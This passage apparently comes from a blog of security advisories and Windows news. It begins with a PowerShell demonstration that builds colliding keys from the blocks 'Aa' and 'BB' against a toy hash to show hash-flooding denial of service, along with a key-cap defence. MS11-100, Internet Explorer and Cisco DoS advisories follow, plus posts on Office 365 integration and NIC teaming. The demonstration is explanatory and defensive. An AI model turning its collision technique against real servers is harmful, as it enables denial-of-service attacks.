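    param([string[]]$Keys, [int]$BucketCount = 1024, [int]$MaxKeys = [int]::MaxValue)
    if ($Keys.Count -gt $MaxKeys) {
        throw "Rejected: $($Keys.Count) keys exceeds the per-request cap of $MaxKeys"
    }
    $buckets = @{}
    $comparisons = 0
    foreach ($key in $Keys) {
        $b = Get-ToyBucket -Key $key -BucketCount $BucketCount
        if (-not $buckets.ContainsKey($b)) {
            $buckets[$b] = New-Object 'System.Collections.Generic.List[string]'
        }
        # A chained table must compare the new key with every key already in the bucket.
        $duplicate = $false
        foreach ($existing in $buckets[$b]) {
            $comparisons++
            if ($existing -ceq $key) { $duplicate = $true; break }
        }
        if (-not $duplicate) { $buckets[$b].Add($key) }
    }
    return $comparisons
}

# Constructed input 1: 1024 ordinary-looking form field names.
$ordinary = 0..1023 | ForEach-Object { "field$_" }

# Constructed input 2: 1024 distinct names built from the blocks 'Aa' and 'BB',
# which this toy hash cannot tell apart, so every name lands in one bucket.
$masks = 1, 2, 4, 8, 16, 32, 64, 128, 256, 512
$colliding = foreach ($i in 0..1023) {
    -join ($masks | ForEach-Object { if ($i -band $_) { 'BB' } else { 'Aa' } })
}

"ordinary keys : {0} comparisons" -f (Measure-InsertCost -Keys $ordinary)
"colliding keys: {0} comparisons" -f (Measure-InsertCost -Keys $colliding)

# With a cap on keys per request the oversized request is refused before any hashing.
try { Measure-InsertCost -Keys $colliding -MaxKeys 1000 }
catch { "capped: $($_.Exception.Message)" }
```

    Both inputs carry the same number of keys, so request size alone does not separate them; the comparison count grows with the square of the key count only for the colliding set.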
    Solution Path:
    Microsoft has released .NET Framework updates to fix these vulnerabilities. If you have web servers or clients that use the .NET Framework, you should download, test and deploy the corresponding updates immediately.
    Due to the exhaustive and varied nature of .NET Framework installations (1.1, 2.0, 3.5.x, and 4.0 running on many Windows platforms), we will not include links to all the updates here. We recommend you visit the “Affected and Non-Affected Software” section of Microsoft’s bulletin for those details.
    If possible, we also recommend you use Windows Update to automatically download and install the appropriate .NET Framework on client computers. That said, you may still want to keep production servers on a manual update process, to avoid upgrade-related problems that could affect business-critical machines.
    For All Users:
    This attack typically leverages normal looking HTTP requests, which you must allow for users to reach your web application. Therefore, Microsoft’s patches are your primary recourse.
    Status:
    Microsoft has released updates to correct this vulnerability.
    References:
    · Microsoft Security Bulletin MS11-100
    · Microsoft Security Advisory
    · Microsoft Security Blog Post
    · Technical Write-up on ASP.NET Hash Table DoS Flaw
  22. Ioannis Zontos
    On 19/12/2011 the Office 365 Integration Module for Windows Small Business Server 2011 Essentials (OIM) was released.
    Customers who have Microsoft Small Business Essentials can download it from the Microsoft Download Center.
    This module allows customers who have Small Business Server 2011 Essentials to keep their core services, such as domain services, file services, etc., on-premise and to very easily integrate their email and whatever other services they have in the cloud with Office 365, all at the lowest administrative cost.
    This integration module will help us have user and server management in one central place, and it also helps the small business manage its users locally and in the cloud from the same console.
    Together with the Windows 7 Professional Pack Add-in for SBS Essentials and the Windows Phone Connector, Microsoft has provided all the tools a small company needs to manage its IT infrastructure, email and collaboration, mobility and client computing.
    More information about SBS Essentials can be found in the webcast here.
  23. Ioannis Zontos
    One of the many new features of Windows 8 is network card teaming with Load Balancing and Failover (LBFO). This is, among many other things, a hugely anticipated improvement.
    Now, about teaming
    It works in the parent and in the guest.

    ■ Nothing else is needed, only the network card (NIC) and Windows 8, that is all.
    ■ A nice and simple GUI to configure the teaming
    ■ Full PowerShell support for the above
    ■ We can team cards from different NIC vendors
    Now, depending on the switch we have
    ■ It supports a number of teaming modes
    1. Switch Independent: This mode uses algorithms that do not require the switch to do anything for the teaming. The benefit is that you can use multiple switches for fault tolerance without special requirements (stacked switches), hence reduced cost
    2. Switch Dependent: Here the switch plays its part and is involved in the teaming. As a result, this requires all the network cards in the team to be connected to the same switch, unless you have stacked switches. Here two variants are supported.
    · Static (IEEE 802.3ad) or Generic
    · LACP (IEEE 802.1ax, also known as dynamic teaming)
    ■ There are 2 load balancing options
    1. Hyper-V Port: Virtual machines have independent MAC addresses which can be used to load balance traffic
    2. Address Hash: A hash (there are different types, see the white paper mentioned at the end for details on this)

    Now, what is supported in Windows teaming and what is not
    · Scalability. You can have up to 32 NICs in a single team
    · There is no THEORETICAL limit on how many virtual interfaces you can create on a team.
    · You can mix NICs of different speeds in the same team
    Not supported
    · TCP Chimney: TCP Chimney is not supported with network adapter teaming in Windows Server “8” Beta. This may change
    · RDMA & NIC Teaming Do Not Mix

  24. Ioannis Zontos
    Severity: High
    Summary:
    · This vulnerability affects: All current versions of Internet Explorer, running on all current versions of Windows (to varying extents)
    · How an attacker exploits it: By enticing one of your users to visit a malicious web page
    · Impact: Various; in the worst case an attacker can execute code on your user's computer, gaining complete control of it
    · What to do: Deploy the appropriate Internet Explorer patches immediately, or let Windows Automatic Update do it for you
    Exposure:
    In a security bulletin released today as part of Patch Day, Microsoft describes four new vulnerabilities in Internet Explorer (IE) 9.0 and earlier versions, running on all current versions of Windows. Microsoft rates the aggregate severity of these new flaws as Critical.
    The four vulnerabilities differ technically, but two of them share the same general scope and impact. These two issues involve memory corruption flaws related to the way IE mishandles various HTML objects. If an attacker can lure one of your users to a web page containing malicious web code, he could exploit either of these vulnerabilities to execute code on that user's computer by inheriting that user's privileges. Typically, Windows users have local administrative privileges, in which case the attacker gains complete control of your users' computers.
    This update also fixes two less severe information disclosure vulnerabilities, which you can read more about in Microsoft's bulletin.
    Today's attackers commonly hijack legitimate web pages and booby-trap them with malicious code. Often, even recognizable and authentic websites get hijacked in this way, and are forced to deliver drive-by download attacks. To avoid these types of attacks, we recommend that you install Microsoft's IE updates as quickly as you can.
    Solution Path:
    These patches fix serious issues. You should download, test, and deploy the appropriate IE patches immediately, or let Windows Automatic Update do it for you.
    This link takes you directly to the “Affected and Non-Affected Software” section of Microsoft's IE bulletin, where you can find links for the various IE updates.
    Status:
    Microsoft has released patches to fix these vulnerabilities.
    References:
    · MS Security Bulletin MS12-010

  25. Ioannis Zontos
    Potential Zero Day Cisco IOS DoS Vulnerabilities
    A new issue was published on the Bugtraq mailing list [ 1 / 2 ] concerning 2 new zero-day Denial of Service (DoS) vulnerabilities in Cisco routers and switches. The initial research was done by the penetration test team of NCNIPC (China).
    The information they have provided is minimal, and Cisco has neither denied nor confirmed it.
    A short excerpt about it:
    They do say, attackers can trigger one DoS with a UDP packet flood and the other with an SNMP packet sent to improper ports. In either case, the attack can put your IOS devices in a non-responsive state, requiring a reboot. By carrying out this sort of attack against your gateway router, an attacker can fairly easily knock you offline.
    In the meantime, keep your eyes out for UDP floods
    Cisco has since replied to these vulnerability allegations, saying they are researching the situations. However, they did not confirm or deny the DoS flaws, nor have they had time to release patches. Until they do, you can mitigate the risk of one of the flaws by disabling SNMP on your IOS device.